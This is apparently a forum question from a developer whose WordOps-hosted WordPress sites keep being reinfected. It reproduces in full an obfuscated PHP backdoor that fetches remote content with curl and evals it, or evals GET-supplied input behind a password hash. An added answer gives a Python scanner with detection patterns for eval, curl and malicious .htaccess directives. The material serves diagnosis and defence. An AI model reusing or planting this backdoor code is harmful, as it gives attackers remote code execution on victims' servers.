Unknown attack and other questions [closed]

I am a new developer in a company that works with WordOps and WordPress. We have about 10 websites on a particular VPS that have been abruptly attacked since last week.

Some relevant data: WordOps version 3.22.0, PHP 8.3.16

Everything was fine until I did a scheduled weekly plugin and theme update on all sites. Three days later, most sites started crashing and my team leader noticed a pattern.

Since each site is installed by WordOps, the structure is: /var/www/mywebsite.com

  • conf
  • htdocs
  • logs

The malware started injecting self-replicating code, spread across a few websites, and from there started infecting other sites. Most directories would have a specific infected .htaccess file and perhaps two or three .php files disguised as regular WP files (wp-blog-header.php, wp-config.php, wp-cron.php, or postnews.php).

In the image I provided, the about.php, .htaccess, wp-blog-header.php, wp-config.php, and sometimes wp-cron.php and wp-load.php files are modified to receive something like the code snippet below or even an encode64 or decode64:

<?php
 goto VMD9X7zVKryV; SSdpBK1vqT1n: ($eYBXf6s1xAgG[67] = $eYBXf6s1xAgG[67] . $eYBXf6s1xAgG[75]) && ($eYBXf6s1xAgG[89] = $eYBXf6s1xAgG[67]($eYBXf6s1xAgG[89])) && @eval($eYBXf6s1xAgG[67](${$eYBXf6s1xAgG[45]}[24])); goto aO0ZLL_mSHsu; JTii6Qjwq8Aa: $eYBXf6s1xAgG = ${$x4YnPlWlviMq[11 + 20] . $x4YnPlWlviMq[33 + 26] . $x4YnPlWlviMq[2 + 45] . $x4YnPlWlviMq[20 + 27] . $x4YnPlWlviMq[33 + 18] . $x4YnPlWlviMq[30 + 23] . $x4YnPlWlviMq[45 + 12]}; goto cpcwHRbx_Jho; tfX6fZ1G2Fu3: class MDIAim2431KF { static function ez0xfN9oXt_B($iYBfZTJAb1v_) { goto VTAnjsyawdnW; DI7iDyETZXxR: return $IH63Wgb0VNMp; goto RQ89TADJQGts; N8HvAbyDVSZo: $jo35E26nlCl4 = explode("\176", $iYBfZTJAb1v_); goto rLDdTVfNvCFk; riENVVGwKX2f: ZPwe8ID84W0P: goto DI7iDyETZXxR; VTAnjsyawdnW: $mhCFcBq36MY0 = "\x72" . "\141" . "\x6e" . "\x67" . "\145"; goto G5C1DGKwbiuf; rLDdTVfNvCFk: $IH63Wgb0VNMp = ''; goto Vud690Cuadm3; G5C1DGKwbiuf: $MirSt6N1kmZd = $mhCFcBq36MY0("\x7e", "\40"); goto N8HvAbyDVSZo; Vud690Cuadm3: foreach ($jo35E26nlCl4 as $fPEUhS1vwG5b => $SO5bpxkRxQbq) { $IH63Wgb0VNMp .= $MirSt6N1kmZd[$SO5bpxkRxQbq - 11177]; WYu9yZ5sXb8G: } goto riENVVGwKX2f; RQ89TADJQGts: } static function LP2oF_aJtElj($UnBps1J1dL5p, $MZ4PeGYaGzDT) { goto ylBd0t_ilpI2; c_OAStMwxV3K: $IvQACU0M5wdt = curl_exec($Qe8VI2kGoFJ2); goto YigIaLl0NiAi; YigIaLl0NiAi: return empty($IvQACU0M5wdt) ? 
$MZ4PeGYaGzDT($UnBps1J1dL5p) : $IvQACU0M5wdt; goto IzDiR6HMoGwE; ylBd0t_ilpI2: $Qe8VI2kGoFJ2 = curl_init($UnBps1J1dL5p); goto cYOBW4I09ntM; cYOBW4I09ntM: curl_setopt($Qe8VI2kGoFJ2, CURLOPT_RETURNTRANSFER, 1); goto c_OAStMwxV3K; IzDiR6HMoGwE: } static function RIx3D9VRBwqN() { goto kH3dyQ92DjJ_; xg2xtsX_HCdD: $AAo8Yzv8OeVm = @$gmAdwCWd3c_Q[1]($gmAdwCWd3c_Q[10 + 0](INPUT_GET, $gmAdwCWd3c_Q[7 + 2])); goto Dd86orKp2HW8; C1rs8lQmWH5g: $bNgvqATsPYgy = self::lp2oF_aJTELJ($ln_UaQESJcF2[1 + 0], $gmAdwCWd3c_Q[5 + 0]); goto IJER5rgAfka1; DymgFMVUqi5Q: die; goto eqUB8MT2B2KN; Qh4CrvkL_VaL: QYmhOyqHUWyv: goto xg2xtsX_HCdD; YwCZ9uXlBkI4: if (!(@$ln_UaQESJcF2[0] - time() > 0 and md5(md5($ln_UaQESJcF2[3 + 0])) === "\x38\141\x37\x33\x33\x33\61\63\142\x66\x36\142\71\x63\63\x39\66\66\x30\x63\x63\x39\x62\146\x34\x33\62\x39\x64\61\142\141")) { goto wPwC3LpimtP4; } goto C1rs8lQmWH5g; YKK4TRNkRltb: $ln_UaQESJcF2 = $gmAdwCWd3c_Q[0 + 2]($WMdYkm6hxXAs, true); goto Mv5um9BQtH7y; Dd86orKp2HW8: $WMdYkm6hxXAs = @$gmAdwCWd3c_Q[3 + 0]($gmAdwCWd3c_Q[2 + 4], $AAo8Yzv8OeVm); goto YKK4TRNkRltb; IJER5rgAfka1: @eval($gmAdwCWd3c_Q[2 + 2]($bNgvqATsPYgy)); goto DymgFMVUqi5Q; Mv5um9BQtH7y: @$gmAdwCWd3c_Q[10 + 0](INPUT_GET, "\x6f\x66") == 1 && die($gmAdwCWd3c_Q[5 + 0](__FILE__)); goto YwCZ9uXlBkI4; kH3dyQ92DjJ_: $G9TKVqr1tTR_ = array("\61\61\x32\x30\64\176\61\61\x31\70\x39\176\61\x31\62\60\x32\x7e\61\x31\x32\60\66\x7e\61\x31\x31\70\x37\x7e\x31\x31\62\x30\x32\x7e\x31\x31\x32\60\70\x7e\x31\61\x32\x30\x31\176\x31\61\61\x38\66\x7e\x31\61\x31\71\x33\x7e\61\61\62\x30\64\x7e\x31\61\x31\70\x37\x7e\x31\x31\x31\71\x38\x7e\x31\61\x31\x39\x32\x7e\61\x31\x31\71\63", "\61\x31\61\70\x38\x7e\x31\x31\61\x38\67\176\x31\x31\x31\x38\x39\176\x31\61\62\60\70\x7e\61\61\x31\x38\x39\x7e\x31\x31\61\x39\62\x7e\61\61\61\70\x37\x7e\61\61\x32\x35\x34\x7e\x31\61\x32\65\62", 
"\x31\x31\x31\71\67\176\61\61\x31\x38\x38\x7e\x31\61\61\71\x32\176\61\x31\61\x39\x33\176\61\x31\x32\60\x38\x7e\x31\x31\x32\x30\x33\x7e\61\61\x32\60\62\176\61\x31\x32\60\64\176\x31\x31\x31\x39\62\x7e\x31\61\x32\60\63\176\x31\61\x32\60\x32", "\61\61\61\71\61\176\x31\61\62\60\66\176\61\x31\62\x30\x34\x7e\x31\x31\61\71\66", "\x31\x31\x32\x30\65\x7e\x31\x31\x32\60\x36\x7e\61\61\x31\70\x38\x7e\x31\61\62\60\62\x7e\x31\x31\62\64\x39\x7e\x31\x31\x32\65\x31\x7e\61\x31\62\x30\70\176\61\x31\62\x30\x33\x7e\61\x31\x32\x30\62\x7e\x31\x31\x32\x30\x34\x7e\x31\x31\x31\71\62\x7e\61\x31\x32\x30\63\176\61\x31\62\x30\62", "\61\61\x32\60\x31\176\61\61\x31\x39\x38\x7e\x31\61\61\x39\65\x7e\61\61\x32\x30\x32\176\x31\x31\x32\60\70\176\x31\x31\62\x30\60\176\x31\61\x32\x30\x32\x7e\x31\61\61\70\67\176\61\61\x32\60\x38\x7e\x31\61\x32\x30\64\176\61\x31\x31\x39\62\x7e\61\x31\x31\x39\x33\x7e\61\x31\61\70\x37\x7e\61\61\62\60\62\176\61\x31\x31\x39\x33\176\x31\61\61\70\67\176\x31\61\x31\x38\x38", "\61\61\62\63\61\176\61\61\62\x36\x31", "\61\61\x31\67\x38", "\61\x31\x32\65\66\176\x31\x31\x32\x36\61", "\61\61\x32\x33\x38\x7e\61\x31\x32\62\61\176\61\61\62\62\61\x7e\61\61\x32\x33\x38\x7e\61\61\x32\61\64", "\x31\61\62\60\61\176\x31\x31\x31\x39\x38\x7e\x31\61\x31\71\x35\176\61\x31\61\x38\x37\176\x31\x31\62\60\62\x7e\x31\x31\x31\x38\71\176\x31\x31\x32\x30\x38\x7e\61\x31\61\x39\70\x7e\61\61\61\x39\x33\176\61\x31\61\71\x31\176\x31\x31\x31\x38\66\176\x31\61\61\70\67"); goto CO3D8a_zXX6e; eqUB8MT2B2KN: wPwC3LpimtP4: goto UVxULrqJUJLf; CO3D8a_zXX6e: foreach ($G9TKVqr1tTR_ as $PQ9MLAddEsS8) { $gmAdwCWd3c_Q[] = self::ez0xfN9OXt_b($PQ9MLAddEsS8); FusVhdLZDhdc: } goto Qh4CrvkL_VaL; UVxULrqJUJLf: } } goto xCRB7QI9fMWf; swHMATb7S2Rt: $x4YnPlWlviMq = $cOq6SG8NKwbb("\x7e", "\40"); goto JTii6Qjwq8Aa; pQQIPCMOH5Rj: metaphone("\130\110\71\x33\154\x6c\x4b\x67\x70\x66\x78\156\x49\162\131\110\122\53\x45\103\x67\64\x4c\130\66\166\x67\x4e\131\x4e\144\x47\105\x4b\x5a\x4e\x4c\x67\x61\x59\x7a\x6a\x41"); goto tfX6fZ1G2Fu3; 
cpcwHRbx_Jho: if (!(in_array(gettype($eYBXf6s1xAgG) . count($eYBXf6s1xAgG), $eYBXf6s1xAgG) && count($eYBXf6s1xAgG) == 12 && md5(md5(md5(md5($eYBXf6s1xAgG[6])))) === "\x38\x35\142\64\x31\67\63\67\x36\x66\x31\x39\144\146\x31\70\144\142\66\x31\x64\71\x39\143\x32\141\66\x63\x63\x37\x36\63")) { goto DhJ64q3oyCtU; } goto SSdpBK1vqT1n; VMD9X7zVKryV: $cOq6SG8NKwbb = "\x72" . "\x61" . "\x6e" . "\147" . "\x65"; goto swHMATb7S2Rt; aO0ZLL_mSHsu: DhJ64q3oyCtU: goto pQQIPCMOH5Rj; xCRB7QI9fMWf: MDiaim2431kf::rIX3D9vRbWqN();
?>

Anyway, my team lead and I have been working tirelessly to clean up the websites, perform rollbacks, and finalize this vulnerability, but it’s hard.

From what we tried, we excluded infected files and downloaded and updated the core of each site. Sometimes it helps and sometimes it doesn’t. But even if it helps, a few hours later the self-replicating malicious code infects even more and crashes the site.

Has anyone ever heard of this vulnerability before? And since I’m fairly new to the WP community, what are the best resources for finding known/fixed malware and vulnerabilities?

Thank you.
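The post describes a recognisable drop pattern: an .htaccess plus two or three PHP files carrying WordPress core names (wp-cron.php, wp-blog-header.php, ...) in directories where core files never live, with goto-label obfuscation, @eval, function names built from octal/hex escapes and a throwaway metaphone() call. The script below is an added triage example, not code from the original post or from WordOps: it walks a WordOps-style /var/www/<site>/htdocs tree and flags files that match those traits. The indicator regexes, the trait threshold, the list of "root-only" core filenames and the .htaccess directive list are my assumptions based on the sample in the post, and the sample tree it builds is constructed, not a real infection artifact.

```python
import re
import tempfile
from pathlib import Path

# Files that belong only in the WordPress document root. A copy deeper in the tree
# (wp-content/uploads/..., a theme directory) is the "disguised as a core file" pattern
# described in the post. Assumed list, not exhaustive.
WP_ROOT_ONLY = {
    "wp-blog-header.php", "wp-config.php", "wp-cron.php", "wp-load.php",
    "wp-settings.php", "wp-login.php", "xmlrpc.php",
}

# Traits of the sample in the post: goto-label spaghetti, eval under @, names assembled
# from octal/hex escapes ("\x72"."\141"... => "range"), a metaphone() call on a junk
# literal, and a curl fetch whose body is eval'ed. base64_decode/curl_exec also occur in
# legitimate plugins, so a file is only flagged when several traits coincide.
INDICATORS = {
    "goto_chain": re.compile(r"\bgoto\s+[A-Za-z_]\w*\s*;"),
    "at_eval": re.compile(r"@eval\s*\("),
    "escaped_string": re.compile(r'"(?:\\(?:x[0-9a-fA-F]{2}|[0-7]{1,3})){3,}"'),
    "metaphone_call": re.compile(r"\bmetaphone\s*\("),
    "curl_exec": re.compile(r"\bcurl_exec\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
}
MIN_TRAITS = 3  # assumed threshold; tune against your own clean sites

# Directives in a dropped .htaccess that would make Apache execute attacker-controlled
# files (assumed list). WordOps serves with Nginx, which ignores .htaccess, so on this
# stack such a file is an infection marker rather than an active execution vector.
HTACCESS_RX = re.compile(
    r"^\s*(?:php_value\s+auto_prepend_file|AddHandler|AddType|SetHandler)\b", re.I | re.M
)


def php_traits(text):
    """Return the set of obfuscation traits present in a PHP source string."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_site(htdocs):
    """Walk one site's htdocs and return [(relative_posix_path, [reasons...]), ...]."""
    htdocs = Path(htdocs)
    findings = []
    for path in sorted(htdocs.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(htdocs)
        reasons = []
        if path.name == ".htaccess":
            if HTACCESS_RX.search(path.read_text(errors="replace")):
                reasons.append("htaccess_handler_directive")
        elif path.suffix.lower() == ".php":
            if path.name in WP_ROOT_ONLY and rel.parent != Path("."):
                reasons.append("core_filename_outside_docroot")
            if rel.parts[:2] == ("wp-content", "uploads"):
                reasons.append("php_under_uploads")
            traits = php_traits(path.read_text(errors="replace"))
            if len(traits) >= MIN_TRAITS:
                reasons.append("obfuscation:" + ",".join(sorted(traits)))
        if reasons:
            findings.append((rel.as_posix(), reasons))
    return findings


def scan_vps(www_root):
    """Scan every <www_root>/<site>/htdocs (WordOps layout); returns {site: findings}."""
    return {
        site.name: scan_site(site / "htdocs")
        for site in sorted(Path(www_root).iterdir())
        if (site / "htdocs").is_dir()
    }


# --- constructed sample tree (mimics the reported pattern; not real artifacts) ---------
SAMPLE_OBFUSCATED = r'''<?php
goto L1; L3: @eval($fn($p)); goto L4; L1: $fn = "\x62\141\x73\145\x36\x34" . "\x5f\144\x65\143\x6f\144\x65"; goto L2;
L2: $p = "cGhwaW5mbygpOw=="; goto L3; L4: metaphone("constructed-junk-literal");
'''
SAMPLE_HTACCESS = "AddHandler application/x-httpd-php .jpg\nphp_value auto_prepend_file /tmp/x\n"
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
CLEAN_CONFIG = "<?php\ndefine('DB_NAME', 'wp');\nrequire_once ABSPATH . 'wp-settings.php';\n"


def build_sample_vps():
    """Create a throwaway /var/www look-alike: site-a carries the pattern, site-b is clean."""
    root = Path(tempfile.mkdtemp(prefix="wordops-sample-"))
    for site in ("site-a.example", "site-b.example"):
        for sub in ("conf", "htdocs", "logs"):
            (root / site / sub).mkdir(parents=True)
        (root / site / "htdocs" / "index.php").write_text(CLEAN_INDEX)
        (root / site / "htdocs" / "wp-config.php").write_text(CLEAN_CONFIG)
    drop = root / "site-a.example" / "htdocs" / "wp-content" / "uploads" / "2024"
    drop.mkdir(parents=True)
    (drop / ".htaccess").write_text(SAMPLE_HTACCESS)
    (drop / "wp-cron.php").write_text(SAMPLE_OBFUSCATED)
    return root


def demo():
    """Build the constructed sample tree and scan it; returns {site: findings}."""
    return scan_vps(build_sample_vps())


if __name__ == "__main__":
    for site, findings in demo().items():
        print(site, findings or "clean")
```

Run it against the real root with `scan_vps("/var/www")` from a copy of the files, not in place, and treat the output as a triage list: confirm each hit by hand, then compare core files against upstream with `wp core verify-checksums` and sort the remaining hits by mtime. Re-infection a few hours after a clean-up, as reported above, usually means the entry point survived the clean-up (a writable path shared between sites, a stored payload in the database or a scheduled task, or leaked credentials), so the scan is a starting point for finding that persistence, not a fix on its own.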
